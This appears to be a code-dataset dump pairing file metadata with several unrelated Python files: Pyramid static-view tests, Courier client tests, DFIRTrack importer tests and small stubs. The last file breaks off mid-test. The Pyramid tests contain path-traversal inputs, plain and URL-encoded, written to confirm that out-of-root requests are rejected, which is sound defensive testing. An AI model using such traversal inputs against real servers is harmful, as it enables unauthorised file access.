| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
94497d4f63eba902d06684a3f328f2d16600bf0b
| 15,384
|
py
|
Python
|
pyramid/tests/test_static.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
pyramid/tests/test_static.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
pyramid/tests/test_static.py
|
danielpronych/pyramid-doxygen
|
ad95a8c151c2c4e029e03aed2feda2993380f36f
|
[
"BSD-2-Clause"
] | null | null | null |
import datetime
import unittest
# 5 years from now (more or less)
fiveyrsfuture = datetime.datetime.utcnow() + datetime.timedelta(5*365)
class Test_static_view_use_subpath_False(unittest.TestCase):
def _getTargetClass(self):
from pyramid.static import static_view
return static_view
def _makeOne(self, *arg, **kw):
return self._getTargetClass()(*arg, **kw)
def _makeRequest(self, kw=None):
from pyramid.request import Request
environ = {
'wsgi.url_scheme':'http',
'wsgi.version':(1,0),
'SERVER_NAME':'example.com',
'SERVER_PORT':'6543',
'PATH_INFO':'/',
'SCRIPT_NAME':'',
'REQUEST_METHOD':'GET',
}
if kw is not None:
environ.update(kw)
return Request(environ=environ)
def test_ctor_defaultargs(self):
inst = self._makeOne('package:resource_name')
self.assertEqual(inst.package_name, 'package')
self.assertEqual(inst.docroot, 'resource_name')
self.assertEqual(inst.cache_max_age, 3600)
self.assertEqual(inst.index, 'index.html')
def test_call_adds_slash_path_info_empty(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':''})
context = DummyContext()
from pyramid.httpexceptions import HTTPMovedPermanently
self.assertRaises(HTTPMovedPermanently, inst, context, request)
def test_path_info_slash_means_index_html(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
def test_oob_singledot(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/./index.html'})
context = DummyContext()
response = inst(context, request)
self.assertEqual(response.status, '200 OK')
self.assertTrue(b'<html>static</html>' in response.body)
def test_oob_emptyelement(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'//index.html'})
context = DummyContext()
response = inst(context, request)
self.assertEqual(response.status, '200 OK')
self.assertTrue(b'<html>static</html>' in response.body)
def test_oob_dotdotslash(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/subdir/../../minimal.pt'})
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_oob_dotdotslash_encoded(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest(
{'PATH_INFO':'/subdir/%2E%2E%2F%2E%2E/minimal.pt'})
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_oob_os_sep(self):
import os
inst = self._makeOne('pyramid.tests:fixtures/static')
dds = '..' + os.sep
request = self._makeRequest({'PATH_INFO':'/subdir/%s%sminimal.pt' %
(dds, dds)})
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_resource_doesnt_exist(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/notthere'})
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_resource_isdir(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/subdir/'})
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>subdir</html>' in response.body)
def test_resource_is_file(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/index.html'})
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
def test_resource_is_file_with_wsgi_file_wrapper(self):
from pyramid.response import _BLOCK_SIZE
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/index.html'})
class _Wrapper(object):
def __init__(self, file, block_size=None):
self.file = file
self.block_size = block_size
request.environ['wsgi.file_wrapper'] = _Wrapper
context = DummyContext()
response = inst(context, request)
app_iter = response.app_iter
self.assertTrue(isinstance(app_iter, _Wrapper))
self.assertTrue(b'<html>static</html>' in app_iter.file.read())
self.assertEqual(app_iter.block_size, _BLOCK_SIZE)
app_iter.file.close()
def test_resource_is_file_with_cache_max_age(self):
inst = self._makeOne('pyramid.tests:fixtures/static', cache_max_age=600)
request = self._makeRequest({'PATH_INFO':'/index.html'})
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
self.assertEqual(len(response.headerlist), 5)
header_names = [ x[0] for x in response.headerlist ]
header_names.sort()
self.assertEqual(header_names,
['Cache-Control', 'Content-Length', 'Content-Type',
'Expires', 'Last-Modified'])
def test_resource_is_file_with_no_cache_max_age(self):
inst = self._makeOne('pyramid.tests:fixtures/static',
cache_max_age=None)
request = self._makeRequest({'PATH_INFO':'/index.html'})
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
self.assertEqual(len(response.headerlist), 3)
header_names = [ x[0] for x in response.headerlist ]
header_names.sort()
self.assertEqual(
header_names,
['Content-Length', 'Content-Type', 'Last-Modified'])
def test_resource_notmodified(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/index.html'})
request.if_modified_since = fiveyrsfuture
context = DummyContext()
response = inst(context, request)
start_response = DummyStartResponse()
app_iter = response(request.environ, start_response)
try:
self.assertEqual(start_response.status, '304 Not Modified')
self.assertEqual(list(app_iter), [])
finally:
app_iter.close()
def test_not_found(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/notthere.html'})
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_resource_with_content_encoding(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/arcs.svg.tgz'})
context = DummyContext()
response = inst(context, request)
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/x-tar')
self.assertEqual(response.content_encoding, 'gzip')
response.app_iter.close()
def test_resource_no_content_encoding(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':'/index.html'})
context = DummyContext()
response = inst(context, request)
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'text/html')
self.assertEqual(response.content_encoding, None)
response.app_iter.close()
class Test_static_view_use_subpath_True(unittest.TestCase):
def _getTargetClass(self):
from pyramid.static import static_view
return static_view
def _makeOne(self, *arg, **kw):
kw['use_subpath'] = True
return self._getTargetClass()(*arg, **kw)
def _makeRequest(self, kw=None):
from pyramid.request import Request
environ = {
'wsgi.url_scheme':'http',
'wsgi.version':(1,0),
'SERVER_NAME':'example.com',
'SERVER_PORT':'6543',
'PATH_INFO':'/',
'SCRIPT_NAME':'',
'REQUEST_METHOD':'GET',
}
if kw is not None:
environ.update(kw)
return Request(environ=environ)
def test_ctor_defaultargs(self):
inst = self._makeOne('package:resource_name')
self.assertEqual(inst.package_name, 'package')
self.assertEqual(inst.docroot, 'resource_name')
self.assertEqual(inst.cache_max_age, 3600)
self.assertEqual(inst.index, 'index.html')
def test_call_adds_slash_path_info_empty(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest({'PATH_INFO':''})
request.subpath = ()
context = DummyContext()
from pyramid.httpexceptions import HTTPMovedPermanently
self.assertRaises(HTTPMovedPermanently, inst, context, request)
def test_path_info_slash_means_index_html(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ()
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
def test_oob_singledot(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ('.', 'index.html')
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_oob_emptyelement(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ('', 'index.html')
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_oob_dotdotslash(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ('subdir', '..', '..', 'minimal.pt')
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_oob_dotdotslash_encoded(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ('subdir', '%2E%2E', '%2E%2E', 'minimal.pt')
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_oob_os_sep(self):
import os
inst = self._makeOne('pyramid.tests:fixtures/static')
dds = '..' + os.sep
request = self._makeRequest()
request.subpath = ('subdir', dds, dds, 'minimal.pt')
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_resource_doesnt_exist(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ('notthere,')
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
def test_resource_isdir(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ('subdir',)
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>subdir</html>' in response.body)
def test_resource_is_file(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ('index.html',)
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
def test_resource_is_file_with_cache_max_age(self):
inst = self._makeOne('pyramid.tests:fixtures/static', cache_max_age=600)
request = self._makeRequest()
request.subpath = ('index.html',)
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
self.assertEqual(len(response.headerlist), 5)
header_names = [ x[0] for x in response.headerlist ]
header_names.sort()
self.assertEqual(header_names,
['Cache-Control', 'Content-Length', 'Content-Type',
'Expires', 'Last-Modified'])
def test_resource_is_file_with_no_cache_max_age(self):
inst = self._makeOne('pyramid.tests:fixtures/static',
cache_max_age=None)
request = self._makeRequest()
request.subpath = ('index.html',)
context = DummyContext()
response = inst(context, request)
self.assertTrue(b'<html>static</html>' in response.body)
self.assertEqual(len(response.headerlist), 3)
header_names = [ x[0] for x in response.headerlist ]
header_names.sort()
self.assertEqual(
header_names,
['Content-Length', 'Content-Type', 'Last-Modified'])
def test_resource_notmodified(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.if_modified_since = fiveyrsfuture
request.subpath = ('index.html',)
context = DummyContext()
response = inst(context, request)
start_response = DummyStartResponse()
app_iter = response(request.environ, start_response)
try:
self.assertEqual(start_response.status, '304 Not Modified')
self.assertEqual(list(app_iter), [])
finally:
app_iter.close()
def test_not_found(self):
inst = self._makeOne('pyramid.tests:fixtures/static')
request = self._makeRequest()
request.subpath = ('notthere.html',)
context = DummyContext()
from pyramid.httpexceptions import HTTPNotFound
self.assertRaises(HTTPNotFound, inst, context, request)
class DummyContext:
pass
class DummyStartResponse:
status = ()
headers = ()
def __call__(self, status, headers):
self.status = status
self.headers = headers
| 41.354839
| 80
| 0.642421
| 1,643
| 15,384
| 5.823494
| 0.096166
| 0.051735
| 0.051735
| 0.071279
| 0.929243
| 0.91273
| 0.898411
| 0.895171
| 0.895171
| 0.895171
| 0
| 0.005637
| 0.23895
| 15,384
| 371
| 81
| 41.466307
| 0.811582
| 0.002015
| 0
| 0.838415
| 0
| 0
| 0.149502
| 0.06651
| 0
| 0
| 0
| 0
| 0.17378
| 1
| 0.125
| false
| 0.003049
| 0.070122
| 0.003049
| 0.234756
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
849f6a751659bc40bf1e15374c00140755cbbbe3
| 160
|
py
|
Python
|
src/clusto/drivers/devices/common/__init__.py
|
rongoro/clusto
|
d6425433e5132e8778feeb9db4b8dd80b933b030
|
[
"BSD-3-Clause"
] | 5
|
2015-07-19T08:28:01.000Z
|
2021-07-08T14:49:27.000Z
|
src/clusto/drivers/devices/common/__init__.py
|
wt/clusto
|
c114ce7c42dcfa33c1e79f4d3b49313115fea06b
|
[
"BSD-3-Clause"
] | null | null | null |
src/clusto/drivers/devices/common/__init__.py
|
wt/clusto
|
c114ce7c42dcfa33c1e79f4d3b49313115fea06b
|
[
"BSD-3-Clause"
] | 5
|
2015-01-06T07:57:07.000Z
|
2021-11-10T18:01:33.000Z
|
from clusto.drivers.devices.common.portmixin import *
from clusto.drivers.devices.common.ipmixin import *
from clusto.drivers.devices.common.snmpmixin import *
| 40
| 53
| 0.83125
| 21
| 160
| 6.333333
| 0.428571
| 0.225564
| 0.383459
| 0.541353
| 0.766917
| 0.541353
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 160
| 3
| 54
| 53.333333
| 0.898649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
84a6ec319fa7480411842e596ccfaee58c75c889
| 177
|
py
|
Python
|
{{ cookiecutter.project_slug }}/src/{{ cookiecutter.project_slug }}/settings/__init__.py
|
moorinteractive/coockiecutter-django
|
9c712b2b87459cc3acbfce320f0414da20327761
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.project_slug }}/src/{{ cookiecutter.project_slug }}/settings/__init__.py
|
moorinteractive/coockiecutter-django
|
9c712b2b87459cc3acbfce320f0414da20327761
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.project_slug }}/src/{{ cookiecutter.project_slug }}/settings/__init__.py
|
moorinteractive/coockiecutter-django
|
9c712b2b87459cc3acbfce320f0414da20327761
|
[
"MIT"
] | null | null | null |
from {{ cookiecutter.project_slug }}.settings.base import * # noqa
try:
from {{ cookiecutter.project_slug }}.settings.local import * # noqa
except ImportError:
pass
| 22.125
| 72
| 0.706215
| 20
| 177
| 6.15
| 0.65
| 0.260163
| 0.373984
| 0.439024
| 0.569106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180791
| 177
| 7
| 73
| 25.285714
| 0.848276
| 0.050847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.2
| 0.6
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 8
|
ca4f40c9d5f8661cb0a9d0507a89e3e303997f69
| 3,189
|
py
|
Python
|
user/vistas/templates/administrativo.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/templates/administrativo.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
user/vistas/templates/administrativo.py
|
ZerpaTechnology/occoa
|
a8c0bd2657bc058801a883109c0ec0d608d04ccc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
doc+='''<!DOCTYPE html>
<html>
'''
data["titulo"]="Unexpo núcleo Charallave"
doc+='''
'''
try: doc+=str(incluir(data,"head"))
except Exception, e: doc+=str(e)
doc+='''
<body class="" >
'''
try: doc+=str(incluir(data,"widget-navbar"))
except Exception, e: doc+=str(e)
doc+='''
<div class="container-fluid">
'''
#=incluir(data,"barra-buscador")
doc+='''
<div class="row bg-porcelain height-50">
<div class="col-md-4 height-5 pad-2">
<h1>DACE</h1>
</div>
<div class="col-md-2 height-5">
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar constancia de estudios</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar record Academico</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar requisitos de inscripción</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Carreras</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Especializaciones</div></a>
</div>
<div class="col-md-6 height-5 pad-1 bg-ubuntu_porcelain font-ubuntu">
<p>
Unidad del nucleo charallave encarada de gestionar las inscripicones y administracion de notas de nuestro alumnado
</p>
</div>
</div>
<hr>
<div class="row bg-porcelain height-50">
<div class="col-md-4 height-5 pad-2">
<h1>DOBE</h1>
</div>
<div class="col-md-2 height-5">
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Solicitar beca trabajo</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar record Academico</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar requisitos de inscripción</div></a>
</div>
<div class="col-md-6 height-5 pad-1 bg-ubuntu_porcelain font-ubuntu">
<p>
Unidad del nucleo charallave encarada de gestionar las inscripicones y administracion de notas de nuestro alumnado
</p>
</div>
</div>
<hr>
<div class="row bg-porcelain height-50">
<div class="col-md-4 height-5 pad-2">
<h1>DIRECCIÓN</h1>
</div>
<div class="col-md-2 height-5">
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Enviar carta</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar record Academico</div></a>
<a href="" class="d-block decoration-none marg-05"><div class="pad-1 bg-ubuntu_blue white decoration-none">Descargar requisitos de inscripción</div></a>
</div>
<div class="col-md-6 height-5 pad-1 bg-ubuntu_porcelain font-ubuntu">
<p>
Unidad del nucleo charallave encarada de gestionar las inscripicones y administracion de notas de nuestro alumnado
</p>
</div>
</div>
'''
try: doc+=str(incluir(data,"footer"))
except Exception, e: doc+=str(e)
doc+='''
<div class="row">
</div>
</div>
</body>
</html>'''
| 38.421687
| 153
| 0.706805
| 525
| 3,189
| 4.266667
| 0.169524
| 0.089286
| 0.0375
| 0.075
| 0.885268
| 0.858482
| 0.858482
| 0.846875
| 0.846875
| 0.816518
| 0
| 0.02445
| 0.102226
| 3,189
| 83
| 154
| 38.421687
| 0.757946
| 0.021637
| 0
| 0.746667
| 0
| 0.186667
| 0.909557
| 0.127325
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ca9af783aae4319783690b6816af069b3f01dca0
| 3,083
|
py
|
Python
|
tests/test_automations.py
|
andrewmilas10/courier-python
|
d0935bcef2dfc67324794b2ba320a69256131422
|
[
"MIT"
] | 13
|
2020-07-29T22:05:36.000Z
|
2021-08-10T14:32:50.000Z
|
tests/test_automations.py
|
andrewmilas10/courier-python
|
d0935bcef2dfc67324794b2ba320a69256131422
|
[
"MIT"
] | 18
|
2020-03-19T20:04:45.000Z
|
2022-03-31T23:32:11.000Z
|
tests/test_automations.py
|
andrewmilas10/courier-python
|
d0935bcef2dfc67324794b2ba320a69256131422
|
[
"MIT"
] | 8
|
2020-05-15T15:30:29.000Z
|
2022-02-08T14:10:48.000Z
|
import json
import responses
import pytest
from os import environ
from trycourier.client import Courier
from trycourier.exceptions import CourierAPIException
@responses.activate
def test_success_invoke():
responses.add(
responses.POST,
'https://api.courier.com/automations/invoke',
status=200,
content_type='application/json',
body='{"runId": "12345"}'
)
c = Courier(auth_token='123456789ABCDF')
r = c.automations.invoke(
automation={'steps': [{ 'action': 'send' }]},
brand='W50NC77P524K14M5300PGPEK4JMJ',
data={'foo': 'bar'},
profile={'email': 'test@example.com'},
recipient='4321',
template='template-001'
)
request_params = json.loads(
responses.calls[0].request.body.decode('utf-8'))
assert r == {"runId": "12345"}
assert request_params["automation"] == {'steps': [{ 'action': 'send' }]}
assert request_params["brand"] == 'W50NC77P524K14M5300PGPEK4JMJ'
assert request_params["data"] == {'foo': 'bar'}
assert request_params["profile"] == {'email': 'test@example.com'}
assert request_params["recipient"] == '4321'
assert request_params["template"] == 'template-001'
@responses.activate
def test_fail_invoke():
responses.add(
responses.POST,
'https://api.courier.com/automations/invoke',
status=500,
content_type='application/json',
body='{"message": "An error occured"}'
)
c = Courier(auth_token='123456789ABCDF')
with pytest.raises(CourierAPIException):
c.automations.invoke(automation={})
@responses.activate
def test_success_invoke_template():
responses.add(
responses.POST,
'https://api.courier.com/automations/my-automation-template/invoke',
status=200,
content_type='application/json',
body='{"runId": "12345"}'
)
c = Courier(auth_token='123456789ABCDF')
r = c.automations.invoke_template(
template_id='my-automation-template',
brand='W50NC77P524K14M5300PGPEK4JMJ',
data={'foo': 'bar'},
profile={'email': 'test@example.com'},
recipient='4321',
template='template-001'
)
request_params = json.loads(
responses.calls[0].request.body.decode('utf-8'))
assert r == {"runId": "12345"}
assert request_params["brand"] == 'W50NC77P524K14M5300PGPEK4JMJ'
assert request_params["data"] == {'foo': 'bar'}
assert request_params["profile"] == {'email': 'test@example.com'}
assert request_params["recipient"] == '4321'
assert request_params["template"] == 'template-001'
@responses.activate
def test_fail_invoke_template():
responses.add(
responses.POST,
'https://api.courier.com/automations/my-automation-template/invoke',
status=500,
content_type='application/json',
body='{"message": "An error occured"}'
)
c = Courier(auth_token='123456789ABCDF')
with pytest.raises(CourierAPIException):
c.automations.invoke_template(template_id='my-automation-template')
| 32.452632
| 76
| 0.647421
| 320
| 3,083
| 6.128125
| 0.221875
| 0.086181
| 0.106578
| 0.048955
| 0.899031
| 0.899031
| 0.867415
| 0.867415
| 0.867415
| 0.828659
| 0
| 0.063158
| 0.198832
| 3,083
| 94
| 77
| 32.797872
| 0.730769
| 0
| 0
| 0.722892
| 0
| 0
| 0.290626
| 0.0506
| 0
| 0
| 0
| 0
| 0.156627
| 1
| 0.048193
| false
| 0
| 0.072289
| 0
| 0.120482
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
046f31610d0817246ce89f57dede49d258bb65bb
| 20,376
|
py
|
Python
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/system_importer/test_system_importer_file_csv_check_content_file_system.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 1
|
2021-07-24T17:22:50.000Z
|
2021-07-24T17:22:50.000Z
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/system_importer/test_system_importer_file_csv_check_content_file_system.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 2
|
2022-02-28T03:40:31.000Z
|
2022-02-28T03:40:52.000Z
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/system_importer/test_system_importer_file_csv_check_content_file_system.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 2
|
2022-02-25T08:34:51.000Z
|
2022-03-16T17:29:44.000Z
|
from django.contrib.auth.models import User
from django.contrib.messages import get_messages
from django.test import TestCase
from django.utils import timezone
from dfirtrack.settings import BASE_DIR
from dfirtrack_main.importer.file.csv import system_cron
from dfirtrack_main.tests.system_importer.config_functions import set_csv_import_username, set_csv_import_filename, set_csv_import_path
import os
import urllib.parse
def create_file_no_read_permission(csv_import_path, csv_import_filename):
""" create a file and remove all permissions """
# build csv file path
csv_path = f'{csv_import_path}/{csv_import_filename}'
# create file
csv_file = open(csv_path, 'w')
# write content to file
csv_file.write('This is no valid CSV file but that does not matter at the moment.')
# close file
csv_file.close()
# remove all permissions
os.chmod(csv_path, 0000)
# return to test function
return
class SystemImporterFileCsvCheckConfigContentFileSystemViewTestCase(TestCase):
""" system importer file CSV view tests """
@classmethod
def setUpTestData(cls):
""" one-time setup """
# create users
test_user = User.objects.create_user(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
User.objects.create_user(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# change config
set_csv_import_username(test_user)
""" path not existing """
def test_system_importer_file_csv_check_content_file_system_create_cron_path_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/path_not_existing')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/cron/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import path does not exist. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_path_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/path_not_existing')
# execute cron job / scheduled task
system_cron()
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import path does not exist. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
# switch user context
self.client.logout()
self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'message_user')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import path does not exist. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_path_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/path_not_existing')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/instant/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import path does not exist. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
""" path no read permission """
def test_system_importer_file_csv_check_content_file_system_create_cron_path_no_read_permission(self):
""" test importer view """
# change config
set_csv_import_path('/root')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/cron/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'No read permission for CSV import path. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_path_no_read_permission(self):
""" test importer view """
# change config
set_csv_import_path('/root')
# execute cron job / scheduled task
system_cron()
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] No read permission for CSV import path. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
# switch user context
self.client.logout()
